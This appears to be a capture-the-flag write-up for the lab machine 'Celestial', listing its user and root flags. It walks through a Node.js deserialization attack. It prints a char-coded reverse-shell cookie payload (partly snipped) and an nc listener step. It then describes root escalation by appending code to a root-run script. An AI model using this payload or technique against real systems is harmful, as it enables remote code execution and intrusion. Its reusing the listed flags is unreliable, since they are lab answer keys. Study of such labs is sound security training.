Celestial

Celestial - 10.10.10.85

Target Enumeration:

OS: Linux
IP: 10.10.10.85
User: 9a093cd22ce86b7f41db4116e80d0b0f
Root: ba1d0019200a54e370ca151007a8095a

Ports / Services / Software Versions Running

3000/tcp open http Node.js Express framework

Vulnerability Exploited:

Nodejs Deserialization bug

Privilege Escalation:

Python script running as root in the users documents folder

Exploiting the host:

Nmap
Visiting in browser:
Decoding the cookie gives you:
Checking for vulnerabilities in node.js we found
Download nodejsshell.py and run
Copy this to a file and modify to replicate this whole string as per the guide on the link:
1
{"rce":"_$ND_FUNC$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
Copied!
Encode this in base64 and replace the cookie.
Set up a nc listener on 443 and send the request
Your listener will now spawn a shell.
Located in the documents folder is script.py
This appears to run every 5 mins and overwrites itself so you are unable to inject a reverse python shell without it breaking. Also found is output.txt.
This holds the output from the script.py and while we have not found a crontab for root we can assume that it will execute every 5 minutes what ever is in the script.py file as the root user as it overwrites output.txt.
So append to the end of the file:
And set up a listener on 444 and wait around 5 minutes to get the root shell.
Checking roots crontab shows that they are overwriting the file every 5 minutes
Last modified 2yr ago